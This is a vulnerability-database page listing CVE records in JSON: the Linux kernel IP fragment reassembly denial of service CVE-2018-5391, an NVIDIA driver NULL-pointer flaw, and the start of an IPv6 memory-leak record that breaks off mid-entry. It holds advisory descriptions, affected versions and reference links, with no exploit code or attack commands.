https://access.redhat.com/errata/RHSA-2018:3083vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2018:2925vendor-advisory, x_refsource_REDHAT
https://www.kb.cert.org/vuls/id/641765third-party-advisory, x_refsource_CERT-VN
http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2018-004.txtx_refsource_CONFIRM
https://usn.ubuntu.com/3741-2/vendor-advisory, x_refsource_UBUNTU
http://www.securitytracker.com/id/1041476vdb-entry, x_refsource_SECTRACK
https://access.redhat.com/errata/RHSA-2018:3459vendor-advisory, x_refsource_REDHAT
https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/commit/?id=c30f1fc041b74ecdb072dd44f858750414b8b19fx_refsource_MISC
https://access.redhat.com/errata/RHSA-2018:2933vendor-advisory, x_refsource_REDHAT
https://usn.ubuntu.com/3740-2/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/3741-1/vendor-advisory, x_refsource_UBUNTU
https://access.redhat.com/errata/RHSA-2018:3590vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2018:2948vendor-advisory, x_refsource_REDHAT
https://usn.ubuntu.com/3742-2/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/3740-1/vendor-advisory, x_refsource_UBUNTU
http://www.securityfocus.com/bid/105108vdb-entry, x_refsource_BID
https://lists.debian.org/debian-lts-announce/2018/08/msg00014.htmlmailing-list, x_refsource_MLIST
https://usn.ubuntu.com/3742-1/vendor-advisory, x_refsource_UBUNTU
https://access.redhat.com/errata/RHSA-2018:2924vendor-advisory, x_refsource_REDHAT
https://www.debian.org/security/2018/dsa-4272vendor-advisory, x_refsource_DEBIAN
https://access.redhat.com/errata/RHSA-2018:3586vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2018:2846vendor-advisory, x_refsource_REDHAT
http://www.securitytracker.com/id/1041637vdb-entry, x_refsource_SECTRACK
https://access.redhat.com/errata/RHSA-2018:3096vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2018:2791vendor-advisory, x_refsource_REDHAT
https://lists.debian.org/debian-lts-announce/2019/03/msg00017.htmlmailing-list, x_refsource_MLIST
https://security.netapp.com/advisory/ntap-20181003-0002/x_refsource_CONFIRM
http://www.openwall.com/lists/oss-security/2019/06/28/2mailing-list, x_refsource_MLIST
http://www.openwall.com/lists/oss-security/2019/07/06/3mailing-list, x_refsource_MLIST
http://www.openwall.com/lists/oss-security/2019/07/06/4mailing-list, x_refsource_MLIST
https://support.f5.com/csp/article/K74374841?utm_source=f5support&amp%3Butm_medium=RSSx_refsource_CONFIRM
http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-linux-enx_refsource_CONFIRM
https://cert-portal.siemens.com/productcert/pdf/ssa-377115.pdfx_refsource_CONFIRM
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T05:33:44.368Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "RHSA-2018:3540",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:3540"
          },
          {
            "name": "RHSA-2018:2785",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:2785"
          },
          {
            "name": "RHSA-2018:3083",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:3083"
          },
          {
            "name": "RHSA-2018:2925",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:2925"
          },
          {
            "name": "VU#641765",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "https://www.kb.cert.org/vuls/id/641765"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2018-004.txt"
          },
          {
            "name": "USN-3741-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/3741-2/"
          },
          {
            "name": "1041476",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1041476"
          },
          {
            "name": "RHSA-2018:3459",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:3459"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/commit/?id=c30f1fc041b74ecdb072dd44f858750414b8b19f"
          },
          {
            "name": "RHSA-2018:2933",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:2933"
          },
          {
            "name": "USN-3740-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/3740-2/"
          },
          {
            "name": "USN-3741-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/3741-1/"
          },
          {
            "name": "RHSA-2018:3590",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:3590"
          },
          {
            "name": "RHSA-2018:2948",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:2948"
          },
          {
            "name": "USN-3742-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/3742-2/"
          },
          {
            "name": "USN-3740-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/3740-1/"
          },
          {
            "name": "105108",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/105108"
          },
          {
            "name": "[debian-lts-announce] 20180815 [SECURITY] [DLA 1466-1] linux-4.9 security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2018/08/msg00014.html"
          },
          {
            "name": "USN-3742-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/3742-1/"
          },
          {
            "name": "RHSA-2018:2924",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:2924"
          },
          {
            "name": "DSA-4272",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2018/dsa-4272"
          },
          {
            "name": "RHSA-2018:3586",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:3586"
          },
          {
            "name": "RHSA-2018:2846",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:2846"
          },
          {
            "name": "1041637",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1041637"
          },
          {
            "name": "RHSA-2018:3096",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:3096"
          },
          {
            "name": "RHSA-2018:2791",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:2791"
          },
          {
            "name": "[debian-lts-announce] 20190315 [SECURITY] [DLA 1715-1] linux-4.9 security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00017.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20181003-0002/"
          },
          {
            "name": "[oss-security] 20190628 Re: linux-distros membership application - Microsoft",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2019/06/28/2"
          },
          {
            "name": "[oss-security] 20190706 Re: linux-distros membership application - Microsoft",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2019/07/06/3"
          },
          {
            "name": "[oss-security] 20190706 Re: linux-distros membership application - Microsoft",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2019/07/06/4"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://support.f5.com/csp/article/K74374841?utm_source=f5support\u0026amp%3Butm_medium=RSS"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-linux-en"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-377115.pdf"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3.9*",
              "status": "affected",
              "version": "3.9",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Thanks to Juha-Matti Tilli (Aalto University, Department of Communications and Networking / Nokia Bell Labs) for reporting this vulnerability."
        }
      ],
      "datePublic": "2018-09-06T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The Linux kernel, versions 3.9+, is vulnerable to a denial of service attack with low rates of specially modified packets targeting IP fragment re-assembly. An attacker may cause a denial of service condition by sending specially crafted IP fragments. Various vulnerabilities in IP fragmentation have been discovered and fixed over the years. The current vulnerability (CVE-2018-5391) became exploitable in the Linux kernel with the increase of the IP fragment reassembly queue size."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-400",
              "description": "CWE-400",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-04-14T12:06:39",
        "orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
        "shortName": "certcc"
      },
      "references": [
        {
          "name": "RHSA-2018:3540",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:3540"
        },
        {
          "name": "RHSA-2018:2785",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:2785"
        },
        {
          "name": "RHSA-2018:3083",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:3083"
        },
        {
          "name": "RHSA-2018:2925",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:2925"
        },
        {
          "name": "VU#641765",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "https://www.kb.cert.org/vuls/id/641765"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2018-004.txt"
        },
        {
          "name": "USN-3741-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/3741-2/"
        },
        {
          "name": "1041476",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1041476"
        },
        {
          "name": "RHSA-2018:3459",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:3459"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/commit/?id=c30f1fc041b74ecdb072dd44f858750414b8b19f"
        },
        {
          "name": "RHSA-2018:2933",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:2933"
        },
        {
          "name": "USN-3740-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/3740-2/"
        },
        {
          "name": "USN-3741-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/3741-1/"
        },
        {
          "name": "RHSA-2018:3590",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:3590"
        },
        {
          "name": "RHSA-2018:2948",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:2948"
        },
        {
          "name": "USN-3742-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/3742-2/"
        },
        {
          "name": "USN-3740-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/3740-1/"
        },
        {
          "name": "105108",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/105108"
        },
        {
          "name": "[debian-lts-announce] 20180815 [SECURITY] [DLA 1466-1] linux-4.9 security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2018/08/msg00014.html"
        },
        {
          "name": "USN-3742-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/3742-1/"
        },
        {
          "name": "RHSA-2018:2924",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:2924"
        },
        {
          "name": "DSA-4272",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2018/dsa-4272"
        },
        {
          "name": "RHSA-2018:3586",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:3586"
        },
        {
          "name": "RHSA-2018:2846",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:2846"
        },
        {
          "name": "1041637",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1041637"
        },
        {
          "name": "RHSA-2018:3096",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:3096"
        },
        {
          "name": "RHSA-2018:2791",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:2791"
        },
        {
          "name": "[debian-lts-announce] 20190315 [SECURITY] [DLA 1715-1] linux-4.9 security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00017.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20181003-0002/"
        },
        {
          "name": "[oss-security] 20190628 Re: linux-distros membership application - Microsoft",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2019/06/28/2"
        },
        {
          "name": "[oss-security] 20190706 Re: linux-distros membership application - Microsoft",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2019/07/06/3"
        },
        {
          "name": "[oss-security] 20190706 Re: linux-distros membership application - Microsoft",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2019/07/06/4"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://support.f5.com/csp/article/K74374841?utm_source=f5support\u0026amp%3Butm_medium=RSS"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-linux-en"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-377115.pdf"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "The Linux kernel, versions 3.9+, IP implementation is vulnerable to denial of service conditions with low rates of specially modified packets",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cert@cert.org",
          "ID": "CVE-2018-5391",
          "STATE": "PUBLIC",
          "TITLE": "The Linux kernel, versions 3.9+, IP implementation is vulnerable to denial of service conditions with low rates of specially modified packets"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Kernel",
                      "version": {
                        "version_data": [
                          {
                            "affected": "\u003e=",
                            "version_affected": "\u003e=",
                            "version_name": "3.9",
                            "version_value": "3.9"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Thanks to Juha-Matti Tilli (Aalto University, Department of Communications and Networking / Nokia Bell Labs) for reporting this vulnerability."
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The Linux kernel, versions 3.9+, is vulnerable to a denial of service attack with low rates of specially modified packets targeting IP fragment re-assembly. An attacker may cause a denial of service condition by sending specially crafted IP fragments. Various vulnerabilities in IP fragmentation have been discovered and fixed over the years. The current vulnerability (CVE-2018-5391) became exploitable in the Linux kernel with the increase of the IP fragment reassembly queue size."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-400"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "RHSA-2018:3540",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:3540"
            },
            {
              "name": "RHSA-2018:2785",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:2785"
            },
            {
              "name": "RHSA-2018:3083",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:3083"
            },
            {
              "name": "RHSA-2018:2925",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:2925"
            },
            {
              "name": "VU#641765",
              "refsource": "CERT-VN",
              "url": "https://www.kb.cert.org/vuls/id/641765"
            },
            {
              "name": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2018-004.txt",
              "refsource": "CONFIRM",
              "url": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2018-004.txt"
            },
            {
              "name": "USN-3741-2",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/3741-2/"
            },
            {
              "name": "1041476",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1041476"
            },
            {
              "name": "RHSA-2018:3459",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:3459"
            },
            {
              "name": "https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/commit/?id=c30f1fc041b74ecdb072dd44f858750414b8b19f",
              "refsource": "MISC",
              "url": "https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/commit/?id=c30f1fc041b74ecdb072dd44f858750414b8b19f"
            },
            {
              "name": "RHSA-2018:2933",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:2933"
            },
            {
              "name": "USN-3740-2",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/3740-2/"
            },
            {
              "name": "USN-3741-1",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/3741-1/"
            },
            {
              "name": "RHSA-2018:3590",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:3590"
            },
            {
              "name": "RHSA-2018:2948",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:2948"
            },
            {
              "name": "USN-3742-2",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/3742-2/"
            },
            {
              "name": "USN-3740-1",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/3740-1/"
            },
            {
              "name": "105108",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/105108"
            },
            {
              "name": "[debian-lts-announce] 20180815 [SECURITY] [DLA 1466-1] linux-4.9 security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2018/08/msg00014.html"
            },
            {
              "name": "USN-3742-1",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/3742-1/"
            },
            {
              "name": "RHSA-2018:2924",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:2924"
            },
            {
              "name": "DSA-4272",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2018/dsa-4272"
            },
            {
              "name": "RHSA-2018:3586",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:3586"
            },
            {
              "name": "RHSA-2018:2846",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:2846"
            },
            {
              "name": "1041637",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1041637"
            },
            {
              "name": "RHSA-2018:3096",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:3096"
            },
            {
              "name": "RHSA-2018:2791",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:2791"
            },
            {
              "name": "[debian-lts-announce] 20190315 [SECURITY] [DLA 1715-1] linux-4.9 security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00017.html"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20181003-0002/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20181003-0002/"
            },
            {
              "name": "[oss-security] 20190628 Re: linux-distros membership application - Microsoft",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2019/06/28/2"
            },
            {
              "name": "[oss-security] 20190706 Re: linux-distros membership application - Microsoft",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2019/07/06/3"
            },
            {
              "name": "[oss-security] 20190706 Re: linux-distros membership application - Microsoft",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2019/07/06/4"
            },
            {
              "name": "https://support.f5.com/csp/article/K74374841?utm_source=f5support\u0026amp;utm_medium=RSS",
              "refsource": "CONFIRM",
              "url": "https://support.f5.com/csp/article/K74374841?utm_source=f5support\u0026amp;utm_medium=RSS"
            },
            {
              "name": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-linux-en",
              "refsource": "CONFIRM",
              "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-linux-en"
            },
            {
              "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-377115.pdf",
              "refsource": "CONFIRM",
              "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-377115.pdf"
            }
          ]
        },
        "source": {
          "discovery": "UNKNOWN"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
    "assignerShortName": "certcc",
    "cveId": "CVE-2018-5391",
    "datePublished": "2018-09-06T21:00:00",
    "dateReserved": "2018-01-12T00:00:00",
    "dateUpdated": "2024-08-05T05:33:44.368Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2017-6257
Vulnerability from cvelistv5
Published
2017-07-27 00:00
Modified
2024-08-05 15:25
Severity
Summary
NVIDIA GPU Display Driver contains a vulnerability in the kernel mode layer handler where a NULL pointer dereference may lead to denial of service or potential escalation of privileges
References
Impacted products
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T15:25:48.623Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4525"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "NVIDIA GPU Display Driver",
          "vendor": "Nvidia Corporation",
          "versions": [
            {
              "status": "affected",
              "version": "All"
            }
          ]
        }
      ],
      "datePublic": "2017-07-27T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "NVIDIA GPU Display Driver contains a vulnerability in the kernel mode layer handler where a NULL pointer dereference may lead to denial of service or potential escalation of privileges"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Denial of Service, Escalation of Privileges",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-28T18:57:01",
        "orgId": "9576f279-3576-44b5-a4af-b9a8644b2de6",
        "shortName": "nvidia"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4525"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@nvidia.com",
          "DATE_PUBLIC": "2017-07-27T00:00:00",
          "ID": "CVE-2017-6257",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "NVIDIA GPU Display Driver",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Nvidia Corporation"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "NVIDIA GPU Display Driver contains a vulnerability in the kernel mode layer handler where a NULL pointer dereference may lead to denial of service or potential escalation of privileges"
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Denial of Service, Escalation of Privileges"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://nvidia.custhelp.com/app/answers/detail/a_id/4525",
              "refsource": "CONFIRM",
              "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4525"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "9576f279-3576-44b5-a4af-b9a8644b2de6",
    "assignerShortName": "nvidia",
    "cveId": "CVE-2017-6257",
    "datePublished": "2017-07-27T00:00:00",
    "dateReserved": "2017-02-23T00:00:00",
    "dateUpdated": "2024-08-05T15:25:48.623Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3524
Vulnerability from cvelistv5
Published
2022-10-16 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel IPv6 ipv6_renew_options memory leak
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.569Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c52c6bb831f6335c176a0fc7214e26f43adbd11"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211021"
          },
          {
            "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
          },
          {
            "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function ipv6_renew_options of the component IPv6 Handler. The manipulation leads to memory leak. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211021 was assigned to this vulnerability."
        }
      ],
      "metrics": [
